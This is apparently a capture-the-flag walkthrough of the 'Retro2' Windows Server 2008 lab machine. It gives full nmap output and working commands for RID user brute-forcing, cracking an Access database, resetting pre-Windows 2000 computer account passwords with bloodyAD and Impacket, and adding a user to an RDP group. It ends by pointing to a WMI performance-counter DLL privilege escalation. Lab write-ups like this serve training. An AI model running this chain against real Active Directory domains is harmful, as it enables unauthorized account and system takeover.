Retro2 is a Easy Windows machine, that starts off with Guest auth enabled to look at shares finding a Microsoft Access Database file. After finding the user and password we are able to obtain a bloodhound dump. This shows a relatively simple path with some twists, we are able to find a couple of Pre-Windows machine and change the password for one. Allowing us to change/reset the password for the computer ADMWS01$ which has a particular attribute that allows the reset of the password. Once we’ve done this we are able to add our user to the Services group allowing for RDP access. Upon getting a session we find that with the version of Windows Server 2008 we are able to control the full path to a windows registry value that allows us to escalate to NT AUTHORITY\SYSTEM.

Initial Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 15:45:22Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-11-08T16:46:17+01:00
| smb2-time:
|   date: 2024-11-08T15:46:14
|_  start_date: 2024-11-08T15:44:30
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: mean: 47m06s, deviation: 34m35s, median: 1h07m04s

NSE: Script Post-scanning.
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Initiating NSE at 08:39
Completed NSE at 08:39, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.68 seconds
           Raw packets sent: 1990 (87.536KB) | Rcvd: 17 (732B)

SMB

Found LOTS users via brute forcing.

1
2
3
4
5
6
7
8
9
10
$ smb retro2.vl -u jay -p '' --rid-brute  | tr -s " " | awk -F'\' '{print $2}' | awk '{print $1}' > users.lst

<SNIP>
Julie.Martin
Clare.Smith
Laura.Davies
Rhys.Richards
Leah.Robinson
Michelle.Bird
<SNIP>

Found MS Access Database.

This file was password protected, so converting using office2john and cracking got us in and found creds.

1
2
3
4

strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "<SNIP>"

BloodHound

Now we can get a bloodhound dump and look at our attack path. From there the path is relatively simple. We can use FS01$ or FS02$. I’m using FS01$.

Seeing as Pre-Windows machines use the same password as their hostname, we can check to see if we have an error that indicates a password change is needed. 

1
2
3
$ nxc smb retro2.vl -u 'FS01$' -p fs01                                                                                         
SMB         10.10.106.109   445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.106.109   445    BLN01            [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

As we didn’t get a STATUS_LOGON_FAILURE, the password for this machine can be reset. We can use bloodyAD to set his password.

1
2
3
4
$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.106.109 --host retro2.vl -d retro2.vl -u 'ldapreader' -p '<SNIP>' set password 'FS01$' 'Password123!' --oldpass fs01 
[*] Trying to connect to retro2.vl...
[+] Connection successful
[+] Password changed successfully!

There are 3 ways to abuse the GenericWrite permission:

  • Shadow Credentials (applicable with Windows Server 2016 and later)
  • Targeted Kerberoasting(affective if your targets password is weak and crackable)
  • Resource-Based Constrained Delegation

None of which will work on this 2008 machine. 😒

Yet the Windows Server 2008 has an attribute, which if writable we can perform a password reset of ADMWS01$ Computer. This article explains some context.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.102.10 --host retro2.vl -d retro2.vl -u 'FS01$' -p 'Password123!' get writable --otype COMPUTER --detail                                                                                    
[*] Trying to connect to retro2.vl... 
[+] Connection successful 
distinguishedName: CN=ADMWS01,CN=Computers,DC=retro2,DC=vl
serviceInstance: CREATE_CHILD
applicationVersion: CREATE_CHILD
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
rpcProfile: CREATE_CHILD
rpcProfileElement: CREATE_CHILD 
msieee80211-Policy: CREATE_CHILD 
serviceAdministrationPoint: CREATE_CHILD   
<SNIP>
ntPwdHistory: WRITE
otherLoginWorkstations: WRITE
unicodePwd: WRITE <-----
userWorkstations: WRITE
maxStorage: WRITE
<SNIP>

With the attribute writable, we can change/reset the password for ADMWS01$. I found it difficult to do with bloodyAD but I used changepassword.py from Impacket that got the job done.

1
2
3
4
5
6
7
$ changepasswd.py -dc-ip 10.10.102.10 -altuser 'FS01$' -altpass 'Password123!' -newpass 'Password123!' -p rpc-samr 'retro2.vl/ADMWS01$@retro2.vl' -reset -admin
 Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Setting the password of retro2.vl\ADMWS01$ as retro2.vl\FS01$
[*] Connecting to DCE/RPC as retro2.vl\FS01$
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Once we’ve done this, we can add ldapreader to the Services group which will allow him to RDP to the machine.

1
2
3
4
$ ./bloodyAD.py -v DEBUG --dc-ip 10.10.102.10 --host retro2.vl -d retro2.vl -u 'ADMWS01$' -p 'Password123!' add groupMember 'Services' 'ldapreader'
[*] Trying to connect to retro2.vl...
[+] Connection successful
[+] ldapreader added to Services

Session as ldapreader

We can get a session going via RDP.

1
$ xfreerdp /v:retro2.vl /u:ldapreader /p:<SNIP> /tls-seclevel:0 +clipboard /dynamic-resolution

I looked around and did some research about Windows Server 2008 R2, finding some articles but I came across something of a no fix by itm4n. Explaining that using Get-WmiObject Win32_Perf can query the Performance counters of the machine and when doing so the WMI service should load a specified DLL that gets us NT AUTHORITY\SYSTEM.

PrivEsc

Once downloading the repo, and compiling, we can transfer it over to the machine and execute it.